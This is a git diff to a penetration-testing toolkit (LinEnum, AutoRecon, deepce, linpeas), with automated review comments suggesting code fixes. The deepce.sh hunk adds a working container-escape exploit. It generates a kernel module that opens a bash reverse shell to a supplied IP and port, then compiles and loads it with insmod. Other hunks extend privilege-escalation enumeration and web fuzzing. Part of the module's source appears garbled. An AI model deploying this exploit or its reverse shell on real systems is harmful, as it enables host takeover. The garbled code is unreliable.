diff --git a/LinEnum.sh b/LinEnum.sh
index a5aea9d..d8c69f2 100755
--- a/LinEnum.sh
+++ b/LinEnum.sh
@@ -1,6 +1,6 @@
 #!/bin/bash
 #A script to enumerate local information from a Linux host
-version="version 0.98"
+version="version 0.982"
 #@rebootuser
 #help function
@@ -375,7 +375,9 @@ fi
 #current path configuration
 pathinfo=`echo $PATH 2>/dev/null`
 if [ "$pathinfo" ]; then
+ pathswriteable=`ls -ld $(echo $PATH | tr ":" " ")`
 echo -e "\e[00;31m[-] Path information:\e[00m\n$pathinfo"
+ echo -e "$pathswriteable"
 echo -e "\n"
 fi
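Review bot: `pathswriteable=\`ls -ld $(echo $PATH | tr ":" " ")\`` leaves the expansion unquoted, so a PATH entry containing whitespace or glob characters is split or globbed before `ls` sees it, and a non-existent entry writes an `ls` error straight into the report because, unlike the `pathinfo` line above it, this one has no `2>/dev/null`. The name also promises a writability check that `ls -ld` does not perform: every entry is listed and the reader has to spot the `w` bits. Splitting on `:` only and keeping errors out of the output is a one-liner, `pathswriteable=$(IFS=:; set -f; ls -ld -- $PATH 2>/dev/null)`; if the variable is meant to hold only the writable entries, `find $PATH -maxdepth 0 -writable 2>/dev/null` under the same `IFS=:` does that on GNU find. An empty entry or `.` in PATH is a finding in its own right and is worth a separate line rather than being lost in the listing.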
@@ -737,25 +739,25 @@ if [ "$postgver" ]; then
 fi
 #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
-postcon1=`psql -U postgres template0 -c 'select version()' 2>/dev/null | grep version`
+postcon1=`psql -U postgres -w template0 -c 'select version()' 2>/dev/null | grep version`
 if [ "$postcon1" ]; then
 echo -e "\e[00;33m[+] We can connect to Postgres DB 'template0' as user 'postgres' with no password!:\e[00m\n$postcon1"
 echo -e "\n"
 fi
-postcon11=`psql -U postgres template1 -c 'select version()' 2>/dev/null | grep version`
+postcon11=`psql -U postgres -w template1 -c 'select version()' 2>/dev/null | grep version`
 if [ "$postcon11" ]; then
 echo -e "\e[00;33m[+] We can connect to Postgres DB 'template1' as user 'postgres' with no password!:\e[00m\n$postcon11"
 echo -e "\n"
 fi
-postcon2=`psql -U pgsql template0 -c 'select version()' 2>/dev/null | grep version`
+postcon2=`psql -U pgsql -w template0 -c 'select version()' 2>/dev/null | grep version`
 if [ "$postcon2" ]; then
 echo -e "\e[00;33m[+] We can connect to Postgres DB 'template0' as user 'psql' with no password!:\e[00m\n$postcon2"
 echo -e "\n"
 fi
-postcon22=`psql -U pgsql template1 -c 'select version()' 2>/dev/null | grep version`
+postcon22=`psql -U pgsql -w template1 -c 'select version()' 2>/dev/null | grep version`
 if [ "$postcon22" ]; then
 echo -e "\e[00;33m[+] We can connect to Postgres DB 'template1' as user 'psql' with no password!:\e[00m\n$postcon22"
 echo -e "\n"
@@ -825,7 +827,8 @@ echo -e "\e[00;31m[-] Can we read/write sensitive files:\e[00m" ; ls -la /etc/pa
 echo -e "\n"
 #search for suid files
-findsuid=`find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;`
+allsuid=`find / -perm -4000 -type f 2>/dev/null`
+findsuid=`find $allsuid -perm -4000 -type f -exec ls -la {} 2>/dev/null \;`
 if [ "$findsuid" ]; then
 echo -e "\e[00;31m[-] SUID files:\e[00m\n$findsuid"
 echo -e "\n"
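Review bot: The success messages for the two `pgsql` checks still read `as user 'psql'` while the commands run `psql -U pgsql`, so the report names an account that was never tried; change both echo lines to `as user 'pgsql'`. Separately, `-w` only stops psql from prompting: it will still authenticate with a password taken from `PGPASSWORD` or `~/.pgpass`, so a hit here does not prove passwordless access. Either word the message as `without being prompted for a password`, or isolate the check from ambient credentials, e.g. `PGPASSWORD= PGPASSFILE=/dev/null psql -U postgres -w template0 -c 'select version()' 2>/dev/null | grep version`, so the finding really means trust/peer authentication.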
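Review bot: `findsuid=\`find $allsuid -perm -4000 -type f -exec ls -la {} 2>/dev/null \;\`` hands the cached path list to `find` unquoted, so any SUID path containing whitespace is split into fragments that do not exist and glob characters are expanded against the current directory; when the cache is empty, GNU `find` with no path argument walks `.` instead. The same pattern is repeated in the next two hunks for `intsuid`, `wwsuid`, `wwsuidrt`, `findsgid`, `intsgid`, `wwsgid` and `wwsgidrt`, so the fix belongs in a small helper that all eight assignments call. Reading the cache one line at a time keeps the single filesystem walk this commit is after and handles spaces; names containing a newline remain unrepresentable in a newline-delimited variable, which is worth a comment. The `-perm -4000 -type f` tests repeated on the cached paths are redundant with the tests that built `allsuid`, so the helper only needs the extra tests (`-perm -4002`, `-uid 0`) the filtered variants add.
```bash
allsuid=$(find / -perm -4000 -type f 2>/dev/null)
# Run ls -la on each newline-separated path in $1 that still passes the optional
# extra find tests given in $2... (e.g. -perm -4002, -uid 0). Paths containing a
# newline cannot be represented in the cache and are not handled.
list_cached() {
  local entry
  [ -n "$1" ] || return 0
  while IFS= read -r entry; do
    find "$entry" -maxdepth 0 -type f "${@:2}" -exec ls -la {} \; 2>/dev/null
  done <<< "$1"
}
findsuid=$(list_cached "$allsuid")
# … unchanged: "[-] SUID files" report and export …
intsuid=$(list_cached "$allsuid" | grep -w $binarylist 2>/dev/null)
wwsuid=$(list_cached "$allsuid" -perm -4002)
wwsuidrt=$(list_cached "$allsuid" -uid 0 -perm -4002)
```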
@@ -837,28 +840,29 @@ if [ "$export" ] && [ "$findsuid" ]; then
 fi
 #list of 'interesting' suid files - feel free to make additions
-intsuid=`find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null`
+intsuid=`find $allsuid -perm -4000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null`
 if [ "$intsuid" ]; then
 echo -e "\e[00;33m[+] Possibly interesting SUID files:\e[00m\n$intsuid"
 echo -e "\n"
 fi
-#lists word-writable suid files
-wwsuid=`find / -perm -4002 -type f -exec ls -la {} 2>/dev/null \;`
+#lists world-writable suid files
+wwsuid=`find $allsuid -perm -4002 -type f -exec ls -la {} 2>/dev/null \;`
 if [ "$wwsuid" ]; then
 echo -e "\e[00;33m[+] World-writable SUID files:\e[00m\n$wwsuid"
 echo -e "\n"
 fi
 #lists world-writable suid files owned by root
-wwsuidrt=`find / -uid 0 -perm -4002 -type f -exec ls -la {} 2>/dev/null \;`
+wwsuidrt=`find $allsuid -uid 0 -perm -4002 -type f -exec ls -la {} 2>/dev/null \;`
 if [ "$wwsuidrt" ]; then
 echo -e "\e[00;33m[+] World-writable SUID files owned by root:\e[00m\n$wwsuidrt"
 echo -e "\n"
 fi
 #search for sgid files
-findsgid=`find / -perm -2000 -type f -exec ls -la {} 2>/dev/null \;`
+allsgid=`find / -perm -2000 -type f 2>/dev/null`
+findsgid=`find $allsgid -perm -2000 -type f -exec ls -la {} 2>/dev/null \;`
 if [ "$findsgid" ]; then
 echo -e "\e[00;31m[-] SGID files:\e[00m\n$findsgid"
 echo -e "\n"
@@ -870,21 +874,21 @@ if [ "$export" ] && [ "$findsgid" ]; then
 fi
 #list of 'interesting' sgid files
-intsgid=`find / -perm -2000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null`
+intsgid=`find $allsgid -perm -2000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null`
 if [ "$intsgid" ]; then
 echo -e "\e[00;33m[+] Possibly interesting SGID files:\e[00m\n$intsgid"
 echo -e "\n"
 fi
 #lists world-writable sgid files
-wwsgid=`find / -perm -2002 -type f -exec ls -la {} 2>/dev/null \;`
+wwsgid=`find $allsgid -perm -2002 -type f -exec ls -la {} 2>/dev/null \;`
 if [ "$wwsgid" ]; then
 echo -e "\e[00;33m[+] World-writable SGID files:\e[00m\n$wwsgid"
 echo -e "\n"
 fi
 #lists world-writable sgid files owned by root
-wwsgidrt=`find / -uid 0 -perm -2002 -type f -exec ls -la {} 2>/dev/null \;`
+wwsgidrt=`find $allsgid -uid 0 -perm -2002 -type f -exec ls -la {} 2>/dev/null \;`
 if [ "$wwsgidrt" ]; then
 echo -e "\e[00;33m[+] World-writable SGID files owned by root:\e[00m\n$wwsgidrt"
 echo -e "\n"
@@ -1225,6 +1229,14 @@ if [ "$checkbashhist" ]; then
 echo -e "\n"
 fi
+#any .bak files that may be of interest
+bakfiles=`find / -name *.bak -type f 2/dev/null`
 if [ "$readmail" ]; then
diff --git a/autorecon.py b/autorecon.py
index 46ba5f2..5b4c07f 100644
--- a/autorecon.py
+++ b/autorecon.py
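Review bot: `bakfiles=\`find / -name *.bak -type f 2/dev/null\`` in the last hunk cannot work: `2/dev/null` is missing the `>`, so it is passed to `find` as a trailing argument after the expression, which GNU find rejects with "paths must precede expression", leaving `bakfiles` empty and printing an error to stderr on every run. The unquoted `*.bak` is also expanded by the shell against the current directory before `find` sees it, so in a directory that happens to contain `.bak` files the pattern silently changes. Both are fixed by `bakfiles=\`find / -name '*.bak' -type f 2>/dev/null\``. The hunk header announces fourteen new lines but only two are visible here, so I cannot see how `$bakfiles` is reported; presumably it follows the `if [ "$var" ]; then echo -e ...` shape of the neighbouring checks.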
@@ -23,32 +23,103 @@ import sys
 import time
 import toml
 import termios
+import appdirs
+import shutil
-def _quit():
-    termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, TERM_FLAGS)
-
-atexit.register(_quit)
-
-TERM_FLAGS = termios.tcgetattr(sys.stdin.fileno())
-
+# Globals
 verbose = 0
-nmap = '-vv --reason -Pn'
-srvname = ''
+nmap = "-vv --reason -Pn"
+srvname = ""
 heartbeat_interval = 60
 port_scan_profile = None
-
 port_scan_profiles_config = None
 service_scans_config = None
 global_patterns = []
-
-username_wordlist = '/usr/share/seclists/Usernames/top-usernames-shortlist.txt'
-password_wordlist = '/usr/share/seclists/Passwords/darkweb2017-top100.txt'
-
-rootdir = os.path.dirname(os.path.realpath(__file__))
-
+username_wordlist = "/usr/share/seclists/Usernames/top-usernames-shortlist.txt"
+password_wordlist = "/usr/share/seclists/Passwords/darkweb2017-top100.txt"
 single_target = False
 only_scans_dir = False
+
+def _quit():
+    TERM_FLAGS = termios.tcgetattr(sys.stdin.fileno())
+    termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, TERM_FLAGS)
+
+
+def _init():
+    global port_scan_profiles_config
+    global service_scans_config
+    global global_patterns
+
+    atexit.register(_quit)
+    appname = "AutoRecon"
+    rootdir = os.path.dirname(os.path.realpath(__file__))
+    default_config_dir = os.path.join(rootdir, "config")
+    config_dir = appdirs.user_config_dir(appname)
+    port_scan_profiles_config_file = os.path.join(config_dir, "port-scan-profiles.toml")
+    service_scans_config_file = os.path.join(config_dir, "service-scans.toml")
+    global_patterns_config_file = os.path.join(config_dir, "global-patterns.toml")
+
+    # Confirm this directory exists; if not, populate it with the default configurations
+    if not os.path.exists(config_dir):
+        os.makedirs(config_dir, exist_ok=True)
+        shutil.copy(
+            os.path.join(default_config_dir, "port-scan-profiles-default.toml"),
+            port_scan_profiles_config_file,
+        )
+        shutil.copy(
+            os.path.join(default_config_dir, "service-scans-default.toml"),
+            service_scans_config_file,
+        )
+        shutil.copy(
+            os.path.join(default_config_dir, "global-patterns-default.toml"),
+            global_patterns_config_file,
+        )
+
+    with open(port_scan_profiles_config_file, "r") as p:
+        try:
+            port_scan_profiles_config = toml.load(p)
+
+            if len(port_scan_profiles_config) == 0:
+                fail(
+                    "There do not appear to be any port scan profiles configured in the {port_scan_profiles_config_file} config file."
+                )
+
+        except toml.decoder.TomlDecodeError as e:
+            fail(
+                "Error: Couldn't parse {port_scan_profiles_config_file} config file. Check syntax and duplicate tags."
+            )
+
+    with open(service_scans_config_file, "r") as c:
+        try:
+            service_scans_config = toml.load(c)
+        except toml.decoder.TomlDecodeError as e:
+            fail(
+                "Error: Couldn't parse service-scans.toml config file. Check syntax and duplicate tags."
+            )
+
+    with open(global_patterns_config_file, "r") as p:
+        try:
+            global_patterns = toml.load(p)
+            if "pattern" in global_patterns:
+                global_patterns = global_patterns["pattern"]
+            else:
+                global_patterns = []
+        except toml.decoder.TomlDecodeError as e:
+            fail(
+                "Error: Couldn't parse global-patterns.toml config file. Check syntax and duplicate tags."
+            )
+
+    if "username_wordlist" in service_scans_config:
+        if isinstance(service_scans_config["username_wordlist"], str):
+            username_wordlist = service_scans_config["username_wordlist"]
+
+    if "password_wordlist" in service_scans_config:
+        if isinstance(service_scans_config["password_wordlist"], str):
+            password_wordlist = service_scans_config["password_wordlist"]
+
+
 def e(*args, frame_index=1, **kvargs):
     frame = sys._getframe(frame_index)
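Review bot: `_init()` assigns `username_wordlist` and `password_wordlist` from `service_scans_config` at the end of the hunk without declaring them `global`, so those two statements create function locals that are discarded on return and the module-level defaults above are always used; add `global username_wordlist, password_wordlist` beside the three existing `global` lines. The rewritten `_quit()` reads `TERM_FLAGS` with `tcgetattr` at exit and immediately writes the same value back, which is a no-op, whereas the removed code captured the flags at import time so that whatever the program later does to the terminal is undone on exit; capture them once in `_init()` (before any terminal change) and have `_quit()` restore that saved value. The `except toml.decoder.TomlDecodeError as e` clauses also rebind `e`, the name of the formatting helper defined right after this hunk, for the duration of the handler; `as exc`, or no binding at all since the value is never used, avoids the confusion. If the config directory already exists from an older install but lacks one of the three files, the `open()` calls raise an unhandled `FileNotFoundError`; copying any missing default file individually rather than only when the directory is absent would cover that, though I cannot see from this page whether a caller handles it.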
@@ -146,40 +217,6 @@ def calculate_elapsed_time(start_time):
     return ', '.join(elapsed_time)
-port_scan_profiles_config_file = 'port-scan-profiles.toml'
-with open(os.path.join(rootdir, 'autorecon_config', port_scan_profiles_config_file), 'r') as p:
-    try:
-        port_scan_profiles_config = toml.load(p)
-
-        if len(port_scan_profiles_config) == 0:
-            fail('There do not appear to be any port scan profiles configured in the {port_scan_profiles_config_file} config file.')
-
-    except toml.decoder.TomlDecodeError as e:
-        fail('Error: Couldn\'t parse {port_scan_profiles_config_file} config file. Check syntax and duplicate tags.')
-
-with open(os.path.join(rootdir, 'autorecon_config', 'service-scans.toml'), 'r') as c:
-    try:
-        service_scans_config = toml.load(c)
-    except toml.decoder.TomlDecodeError as e:
-        fail('Error: Couldn\'t parse service-scans.toml config file. Check syntax and duplicate tags.')
-
-with open(os.path.join(rootdir, 'autorecon_config', 'global-patterns.toml'), 'r') as p:
-    try:
-        global_patterns = toml.load(p)
-        if 'pattern' in global_patterns:
-            global_patterns = global_patterns['pattern']
-        else:
-            global_patterns = []
-    except toml.decoder.TomlDecodeError as e:
-        fail('Error: Couldn\'t parse global-patterns.toml config file. Check syntax and duplicate tags.')
-
-if 'username_wordlist' in service_scans_config:
-    if isinstance(service_scans_config['username_wordlist'], str):
-        username_wordlist = service_scans_config['username_wordlist']
-
-if 'password_wordlist' in service_scans_config:
-    if isinstance(service_scans_config['password_wordlist'], str):
-        password_wordlist = service_scans_config['password_wordlist']
 async def read_stream(stream, target, tag='?', patterns=[], color=Fore.BLUE):
     address = target.address
@@ -595,7 +632,7 @@ async def scan_services(loop, semaphore, target):
                 pending.add(asyncio.ensure_future(run_cmd(semaphore, e(command), target, tag=tag, patterns=patterns)))
-def scan_host(target, concurrent_scans):
+def scan_host(target, concurrent_scans, outdir):
     start_time = time.time()
     info('Scanning target {byellow}{target.address}{rst}')
@@ -655,8 +692,18 @@ class Target:
         self.lock = None
         self.running_tasks = []
-if __name__ == '__main__':
+
+def main():
+    global single_target
+    global only_scans_dir
+    global port_scan_profile
+    global heartbeat_interval
+    global nmap
+    global srvname
+    global verbose
+
+    _init()
     parser = argparse.ArgumentParser(description='Network reconnaissance tool to port scan and automatically enumerate services found on multiple targets.')
     parser.add_argument('targets', action='store', help='IP addresses (e.g. 10.0.0.1), CIDR notation (e.g. 10.0.0.1/24), or resolvable hostnames (e.g. foo.bar) to scan.', nargs="*")
     parser.add_argument('-t', '--targets', action='store', type=str, default='', dest='target_file', help='Read targets from file.')
@@ -814,7 +861,7 @@ if __name__ == '__main__':
     for address in targets:
         target = Target(address)
-        futures.append(executor.submit(scan_host, target, concurrent_scans))
+        futures.append(executor.submit(scan_host, target, concurrent_scans, outdir))
     try:
         for future in as_completed(futures):
@@ -827,3 +874,8 @@ if __name__ == '__main__':
     elapsed_time = calculate_elapsed_time(start_time)
     info('{bgreen}Finished scanning all targets in {elapsed_time}!{rst}')
+
+
+if __name__ == '__main__':
+    main()
+
diff --git a/autorecon_config/service-scans.toml b/autorecon_config/service-scans.toml
index 5210a94..f51fced 100644
--- a/autorecon_config/service-scans.toml
+++ b/autorecon_config/service-scans.toml
@@ -126,12 +126,21 @@ ignore-service-names = [
 command = 'whatweb --color=never --no-errors -a 3 -v {scheme}://{address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_whatweb.txt"'
 [[http.scan]]
- name = 'nikto'
- command = 'nikto -ask=no -h {scheme}://{address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_nikto.txt"'
+ name = 'ffuf'
+ command = 'ffuf -u {scheme}://{address}:{port}/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf.txt'
- [[http.scan]]
- name = 'gobuster'
- command = 'if [[ `gobuster -h 2>&1 | grep -F "mode (dir)"` ]]; then gobuster -u {scheme}://{address}:{port}/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307,401,403" -x "txt,html,php,asp,aspx,jsp" -o "{scandir}/{protocol}_{port}_{scheme}_gobuster.txt"; else gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -z -k -l -x "txt,html,php,asp,aspx,jsp" -o "{scandir}/{protocol}_{port}_{scheme}_gobuster.txt"; fi'
+ [[http.manual]]
+ description = '(nikto) old but generally reliable web server enumeration tool'
+ commands = [
+ 'nikto -ask=no -h {scheme}://{address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_nikto.txt"'
+ ]
+
+ [[http.manual]]
+ description = '(ffuf) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:'
+ commands = [
+ 'ffuf -u {scheme}://{address}:{port}/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf_big.txt',
+ 'ffuf -u {scheme}://{address}:{port}/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf_dirbuster.txt'
+ ]
 [[http.manual]]
 description = '(dirsearch) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:'
diff --git a/chisel b/chisel
index 022f030..575ff87 100755
Binary files a/chisel and b/chisel differ
diff --git a/chisel64 b/chisel64
index 027667b..452fe8b 100755
Binary files a/chisel64 and b/chisel64 differ
diff --git a/deepce.sh b/deepce.sh
index 393b4e6..0a4b0a0 100755
--- a/deepce.sh
+++ b/deepce.sh
@@ -67,6 +67,7 @@ Usage: ${0##*/} [OPTIONS...]
 SOCK use an exposed docker sock to create a new container and mount root partition to priv esc
 CVE-2019-5746
 CVE-2019-5021
+ SYS_MODULE Exploit the SYS_MODULE privilege to create a malicious kernel module and obtain root on the host
 ${DG}[Payloads & Options]$NC
 -i, --ip The local host IP address for reverse shells to connect to
@@ -125,6 +126,8 @@ TIP_CVE_2019_5021="Alpine linux version 3.3.x-3.5.x accidentally allow users to
 TIP_CVE_2019_13139="Docker versions before 18.09.4 are vulnerable to a command execution vulnerability when parsing URLs"
 TIP_CVE_2019_5736="Docker versions before 18.09.2 are vulnerable to a container escape by overwriting the runC binary"
+TIP_SYS_MODULE="Giving the container the SYS_MODULE privilege allows for kernel modules to be mounted. Using this, a malicious module can be used to execute code as root on the host."
+
 DANGEROUS_GROUPS="docker\|lxd\|root\|sudo\|wheel"
 DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override"
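Review bot: The new automatic `ffuf` entry ends in `| tee {scandir}/{protocol}_{port}_{scheme}_ffuf.txt` without the double quotes that every other command in this file places around its `tee` target (compare the `whatweb` line above and the `nikto` line moved into `[[http.manual]]`), so a scan directory containing a space or shell metacharacter splits or mangles the argument and the output file is not written where the tool expects. Quote it as `| tee "{scandir}/{protocol}_{port}_{scheme}_ffuf.txt"`; the two `ffuf` commands in the second added `[[http.manual]]` block have the same gap. The removed `gobuster` entry redirected `2>&1` and the `nikto` one still does, while none of the `ffuf` commands capture stderr, so tool errors never reach the saved file — worth deciding deliberately rather than by omission.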
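Review bot: `TIP_SYS_MODULE` says the capability "allows for kernel modules to be mounted"; modules are loaded (`insmod`/`modprobe`), not mounted, and `SYS_MODULE` is a Linux capability (`CAP_SYS_MODULE`, already listed in `DANGEROUS_CAPABILITIES` two lines below) rather than a "privilege" — the usage line added in the previous hunk uses the same wording. A tip that states the risk precisely reads better for the person hardening the container: `TIP_SYS_MODULE="Granting the container CAP_SYS_MODULE lets it load kernel modules, which run with full kernel privileges on the host; a malicious module can therefore execute code as root outside the container. Drop this capability unless the workload genuinely needs it."`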
@@ -1112,6 +1115,112 @@ exploitDockerSock() { # TODO: Tidy up command } +exploitSysModule(){ + printSection "Exploiting SYS_MODULE" + printTip "$TIP_SYS_MODULE" + + if ! [ -x "$(command -v capsh)" ]; then + printError "capsh is required to run this exploit." + exit 1 + fi + + if ! [ -x "$(command -v make)" ]; then + printError "make is required to run this exploit." + exit 1 + fi + + if ! [ -x "$(command -v insmod)" ]; then + printError "insmod is required to run this exploit." + exit 1 + fi + + if ! [ -d "/lib/modules/$(uname -r)" ]; then + printError "Linux headers for $(uname -r) are required to run this exploit." + exit 1 + fi + + caps=$(capsh --print) + if ! echo "$caps" | grep -qa "cap_sys_module" ; then + printError "We don't have the SYS_MODULE capability, which is required for this exploit" + exit 1 + fi + + if [ -z "$ip" ]; then + printError "Missing reverse shell IP : use --ip" + exit 1 + fi + + if [ -z "$port" ]; then + printError "Missing reverse shell port : use --port" + exit 1 + fi + + module_name=$(tr -dc A-Za-z "$module_name.c" +#include +#include +MODULE_LICENSE("GPL"); +MODULE_AUTHOR("AttackDefense"); +MODULE_DESCRIPTION("LKM reverse shell module"); +MODULE_VERSION("1.0"); +char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/$ip/$port 0>&1", NULL}; +static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL }; +static int __init ${module_name}_init(void) { +return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); +} +static void __exit ${module_name}_exit(void) { +} +module_init(${module_name}_init); +module_exit(${module_name}_exit); +EOF + +cat << EOF > Makefile +obj-m +=${module_name}.o +all: + make -C /lib/modules/$(uname -r)/build M=$(pwd) modules +clean: + make -C /lib/modules/$(uname -r)/build M=$(pwd) clean +EOF + + printSuccess "Done" + + printQuestion "Compiling kernel module..." + + if make 1>/dev/null ; then + printSuccess "Done" + else + printError "Failed to make. 
Do you have all the required libraries installed?"
+ exit 1
+ fi
+
+ printQuestion "Mounting kernel module..."
+
+ if insmod "$module_name.ko" 1>/dev/null ; then
+ printSuccess "Done"
+ else
+ printError "Failed to mount module"
+ exit 1
+ fi
+
+ printQuestion "Cleaning up..."
+
+ rm -r /dev/shm/rev
+
+ cd "$sys_cwd" || exit
+
+ printSuccess "Done"
+
+ printSuccess "Check your reverse shell handler!"
+
+}
+
 ###########################################
 #--------------) Arg Parse (--------------#
 ###########################################
@@ -1246,6 +1355,9 @@ if [ "$exploit" ]; then
 sock | SOCK)
 exploitDockerSock
 ;;
+ sys | SYS | sys_module | SYS_MODULE)
+ exploitSysModule
+ ;;
 *)
 echo "Unknown exploit $1"
 exit 1
diff --git a/linpeas.sh b/linpeas.sh
index 2a23629..b5978a9 100755
--- a/linpeas.sh
+++ b/linpeas.sh
@@ -1,6 +1,6 @@
 #!/bin/sh
-VERSION="v2.8.3"
+VERSION="v3.1.5 - Safe OSCP"
 ADVISORY="This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission."
 ###########################################
@@ -47,6 +47,10 @@ QUIET=""
 CHECKS="SysI,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI,IntFiles"
 WAIT=""
 PASSWORD=""
+THREADS="`((grep -c processor /proc/cpuinfo 2>/dev/null) || ((command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n"`"
+[ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2
+[ -n "$THREADS" ] && eTHREADS="2" #If THREADS is null, put number 2
+[ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" #It THREADS is not a number, put number 2
 HELP=$GREEN"Enumerate and search Privilege Escalation vectors.
 ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors.
 $Y-h$B To show this message
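Review bot: `[ -n "$THREADS" ] && eTHREADS="2"` assigns a variable named `eTHREADS` that nothing reads, and its comment ("If THREADS is null") contradicts the `-n` test; it looks like a leftover copy of the `-z` line above it and should be deleted. More importantly, all three sanity checks run before the `getopts` loop, and the `t) THREADS=$OPTARG;;` arm this commit adds further down stores the user's value unvalidated, so `-t abc` or `-t -1` reaches whatever later consumes `$THREADS`; move the numeric check to just after the option loop's `done`, e.g. `case "$THREADS" in ''|*[!0-9]*|0) THREADS="2";; esac`, which also replaces the `-eq` trick with something plain sh handles without redirecting errors. The detection line has a subtler flaw: `grep -c` prints `0` and exits non-zero when `/proc/cpuinfo` has no `processor` line, so the `||` fallback appends lscpu's count to that `0` (giving e.g. `04`), and `echo -n` is not portable under `#!/bin/sh`; `printf '%s' 2` and testing the grep output rather than its exit status avoid both.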
@@ -59,12 +63,13 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user,
 $Y-o$B Only execute selected checks (SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles). Select a comma separated list.
 $Y-L$B Force linpeas execution.
 $Y-M$B Force macpeas execution.
+ $Y-t$B Threads to search files inside the system (by default it's the number of CPU threads).
 $Y-d $B Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24
 $Y-p -d $B Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports.$DG Ex: -d 192.168.0.1/24 -p 53,139
 $Y-i [-p ]$B Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080
 $GREEN Notice$B that if you select some network action, no PE check will be performed\n\n$NC"
-while getopts "h?asnd:p:i:P:qo:LMw" opt; do
+while getopts "h?asnd:p:i:P:qo:LMwt:" opt; do
 case "$opt" in
 h|\?) printf "$HELP"$NC; exit 0;;
 a) FAST="";;
@@ -79,283 +84,17 @@ while getopts "h?asnd:p:i:P:qo:LMw" opt; do
 L) MACPEAS="";;
 M) MACPEAS="1";;
 w) WAIT=1;;
+ t) THREADS=$OPTARG;;
 esac
 done
 if [ "$MACPEAS" ]; then SCRIPTNAME="macpeas"; else SCRIPTNAME="linpeas"; fi
-printf " ${DG}Starting $SCRIPTNAME. Building blacklists...$NC"
-
-###########################################
-#---------------) Lists (-----------------#
-###########################################
-
-filename="$SCRIPTNAME.txt$RANDOM"
-kernelB=" 4.0.[0-9]+| 4.1.[0-9]+| 4.2.[0-9]+| 4.3.[0-9]+| 4.4.[0-9]+| 4.5.[0-9]+| 4.6.[0-9]+| 4.7.[0-9]+| 4.8.[0-9]+| 4.9.[0-9]+| 4.10.[0-9]+| 4.11.[0-9]+| 4.12.[0-9]+| 4.13.[0-9]+| 3.9.6| 3.9.0| 3.9| 3.8.9| 3.8.8| 3.8.7| 3.8.6| 3.8.5| 3.8.4| 3.8.3| 3.8.2| 3.8.1| 3.8.0| 3.8| 3.7.6| 3.7.0| 3.7| 3.6.0| 3.6| 3.5.0| 3.5| 3.4.9| 3.4.8| 3.4.6| 3.4.5| 3.4.4| 3.4.3| 3.4.2| 3.4.1| 3.4.0| 3.4| 3.3| 3.2| 3.19.0| 3.16.0| 3.15| 3.14| 3.13.1| 3.13.0| 3.13| 3.12.0| 3.12| 3.11.0| 3.11| 3.10.6| 3.10.0| 3.10| 3.1.0| 3.0.6| 3.0.5| 3.0.4| 3.0.3| 3.0.2| 3.0.1| 3.0.0| 2.6.9| 2.6.8| 2.6.7| 2.6.6| 2.6.5| 2.6.4| 2.6.39| 2.6.38| 2.6.37| 2.6.36| 2.6.35| 2.6.34| 2.6.33| 2.6.32| 2.6.31| 2.6.30| 2.6.3| 2.6.29| 2.6.28| 2.6.27| 2.6.26| 2.6.25| 2.6.24.1| 2.6.24| 2.6.23| 2.6.22| 2.6.21| 2.6.20| 2.6.2| 2.6.19| 2.6.18| 2.6.17| 2.6.16| 2.6.15| 2.6.14| 2.6.13| 2.6.12| 2.6.11| 2.6.10| 2.6.1| 2.6.0| 2.4.9| 2.4.8| 2.4.7| 2.4.6| 2.4.5| 2.4.4| 2.4.37| 2.4.36| 2.4.35| 2.4.34| 2.4.33| 2.4.32| 2.4.31| 2.4.30| 2.4.29| 2.4.28| 2.4.27| 2.4.26| 2.4.25| 2.4.24| 2.4.23| 2.4.22| 2.4.21| 2.4.20| 2.4.19| 2.4.18| 2.4.17| 2.4.16| 2.4.15| 2.4.14| 2.4.13| 2.4.12| 